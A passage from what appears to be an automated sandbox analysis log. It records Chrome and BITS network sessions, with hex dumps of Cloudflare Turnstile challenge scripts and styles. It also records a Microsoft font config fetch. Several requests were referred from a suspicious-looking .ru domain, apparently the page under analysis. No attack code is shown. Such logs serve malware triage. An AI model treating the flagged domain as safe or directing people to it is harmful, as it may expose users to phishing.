                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 65 29 7d 66 75 6e 63 74 69 6f 6e 20 58 65 28 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 6e 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c
                                                                                                                                                              Data Ascii: learInterval(Ae)}function Xe(e){var n=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&n.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 62 22 2c 22 2f 22 29 2c 66 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 21 66 29 7b 70 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28 65 2c 22 29 2e 22 29 2c 33 30 37 34 29 3b 72 65 74 75 72 6e 7d 76 61 72 20 79 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 79 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 79 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 31 39 22 3b 76 61 72 20 76 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 76 2e 63 6c 61 73
                                                                                                                                                              Data Ascii: b","/"),f=document.getElementById(e);if(!f){p("Cannot initialize Widget, Element not found (#".concat(e,")."),3074);return}var y=document.createElement("div");y.style.position="fixed",y.style.zIndex="21474836419";var v=document.createElement("div");v.clas
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4f 3b 28 4f 3d 79 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 4f 3d 3d 3d 76 6f 69 64 20 30 7c 7c 4f 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 79 29 7d 29 3b 76 61 72 20 6d 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 65 6c 6c 69 70 73 65 22 29 3b 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 79 22 2c 22 31 32 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 78 22 2c 22 31 32 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 79 22 2c 22 31 32 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 78 22 2c 22 31 32 22 29 2c 6d 2e 73 65 74 41 74
                                                                                                                                                              Data Ascii: function(){var O;(O=y.parentNode)===null||O===void 0||O.removeChild(y)});var m=document.createElementNS("http://www.w3.org/2000/svg","ellipse");m.setAttribute("ry","12"),m.setAttribute("rx","12"),m.setAttribute("cy","12"),m.setAttribute("cx","12"),m.setAt


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.44974623.51.58.94443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:03 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                              2024-01-17 16:39:03 UTC495INHTTP/1.1 200 OK
                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Server: ECAcc (sac/2518)
                                                                                                                                                              X-CID: 11
                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                              X-Ms-Region: prod-eus2-z1
                                                                                                                                                              Cache-Control: public, max-age=79486
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:03 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              X-CID: 2


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.449748104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:04 UTC787OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:04 UTC921INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                              document-policy: js-profiling
                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                              referrer-policy: same-origin
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470083bba6a4201-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:04 UTC448INData Raw: 37 63 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                                                                                                                                              Data Ascii: 7c19<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 3c 73 74 79 6c 65 3e 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 20 7b 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 74 72 6f 6b 65 20 7b 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 20 7b 0a 20 20 30 25 2c 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 20 20 35 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31 2c 20 31 29 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 20 7b
                                                                                                                                                              Data Ascii: <style>@keyframes rotate { 100% { transform: rotate(360deg); }}@keyframes stroke { 100% { stroke-dashoffset: 0; }}@keyframes scale { 0%, 100% { transform: none; } 50% { transform: scale3d(1, 1, 1); }}@keyframes fill {
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 38 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                                                                                                                                                              Data Ascii: font-size: 16px; font-weight: 700;}p { margin: 8px 0; text-align: center; font-size: 20px; font-weight: 400;}#content { display: flex; align-items: center; justify-content: space-between; border: 1px solid #e0e0e0; background-col
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 30 33 38 31 32 37 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 33 38 31 32 37 3b 0a 7d 0a 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 3b 0a 7d 0a 2e 74 68 65 6d 65 2d
                                                                                                                                                              Data Ascii: rcle { stroke-dashoffset: 0; stroke-width: 2; stroke-miterlimit: 10; stroke: #038127; fill: #038127;}.theme-dark #success-icon { box-shadow: inset 0 0 0 #0aa937;}.theme-dark #success-icon .p1 { box-shadow: inset 0 0 0 #0aa937;}.theme-
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 66 66 6c 61 62 65 6c 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 66 66 66 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 20 30 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 2e 34 73 20 66 6f 72 77 61 72 64 73 2c 20 73 63 61 6c 65 20 30 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 2e 39 73 20 62 6f 74 68 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66
                                                                                                                                                              Data Ascii: put:checked ~ .mark::after { border-color: #fbad41;}.theme-dark .offlabel #fail-icon { box-shadow: inset 0 0 0 #fff; animation: fillfail-offlabel-dark 0.4s ease-in-out 0.4s forwards, scale 0.3s ease-in-out 0.9s both;}.theme-dark h1 { color: #f
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 69
                                                                                                                                                              Data Ascii: :hover, .theme-dark #fr-helper-link:focus,.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:hover,.theme-dark #fr-helper-loop-link:focus { color: #949494;}.theme-dark #expired-refresh-link { color: #bbb;}.theme-dark #expi
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 63 34 34 64 30 65 3b 0a 20 20 66 69 6c 6c 3a 20 6e 6f 6e 65 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 35 30 25 20 35 30 25 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 34 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 34 38 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                              Data Ascii: troke-miterlimit: 10; stroke: #c44d0e; fill: none; animation: stroke 0.6s cubic-bezier(0.65, 0, 0.45, 1) forwards;}.failure-cross { transform-origin: 50% 50%; stroke-dasharray: 48; stroke-dashoffset: 48; animation: stroke 0.3s cubic-bezie
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 6c 65 66 74 3a 20 31 38 70 78 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 31 73 20 65 61 73 65 2d 69 6e 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 38 3b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 36 64 36 64 36 64 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 77 69 64 74 68 3a 20 32 34 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29
                                                                                                                                                              Data Ascii: lute; top: 20px; left: 18px; transition: all 0.1s ease-in; z-index: 9998; border: 2px solid #6d6d6d; border-radius: 3px; background: #fff; width: 24px; height: 24px; animation: scale-up-center 0.4s cubic-bezier(0.55, 0.085, 0.68, 0.53)
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 34 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 32 35 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 39 70 78 3b 0a 20 20 6d 61 72 67
                                                                                                                                                              Data Ascii: place-content: center space-evenly; align-items: center; visibility: visible; line-height: 13px; font-size: 11px;}.size-compact #fail-icon { margin-right: 4px; width: 25px; height: 25px;}.size-compact #expired { margin-top: 9px; marg
                                                                                                                                                              2024-01-17 16:39:04 UTC1369INData Raw: 6c 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 33 37 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 20 7b 0a 20 20 72 69 67 68 74 3a 20 31 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 72 69 67 68 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 72 69 67 68 74 3a 20 31 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68 65 63
                                                                                                                                                              Data Ascii: l { padding-right: 37px; padding-left: 0; text-align: right;}.rtl .ctp-checkbox-label input { right: 18px;}.rtl .ctp-checkbox-label input:checked ~ .mark::after { right: 8px;}.rtl .ctp-checkbox-label .mark { right: 18px;}.rtl .ctp-chec


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.2.44974723.51.58.94443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:04 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                              2024-01-17 16:39:04 UTC455INHTTP/1.1 200 OK
                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                              Server: ECAcc (chd/0778)
                                                                                                                                                              X-CID: 11
                                                                                                                                                              Cache-Control: public, max-age=66090
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:04 GMT
                                                                                                                                                              Content-Length: 55
                                                                                                                                                              Connection: close
                                                                                                                                                              X-CID: 2
                                                                                                                                                              2024-01-17 16:39:04 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              11192.168.2.449749104.17.2.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:04 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8470083bba6a4201 HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hq0sk/0x4AAAAAAAQGgmt388O38mZL/auto/normal
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:04 UTC335INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:04 GMT
                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8470083f1ead1a38-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:04 UTC1034INData Raw: 37 65 36 33 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 61 2c 66 77 2c 66 78 2c 66 41 2c 66 42 2c 66 43 2c 66 44 2c 66 45 2c 66 46 2c 66 47 2c 66 48 2c 66 49 2c 66 4a 2c 66 4b 2c 66 4c 2c 66 4d 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 72 2c 67 46 2c 67 53 2c 67 58 2c 67 59 2c 68 38 2c 68 68 2c 68 6c 2c 68 70 2c 68 74 2c 68 75 2c 68 53 2c 68 54 2c 68 55 2c 68 59 2c
                                                                                                                                                              Data Ascii: 7e63window._cf_chl_opt.uaO=false;~function(ia,fw,fx,fA,fB,fC,fD,fE,fF,fG,fH,fI,fJ,fK,fL,fM,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gr,gF,gS,gX,gY,h8,hh,hl,hp,ht,hu,hS,hT,hU,hY,
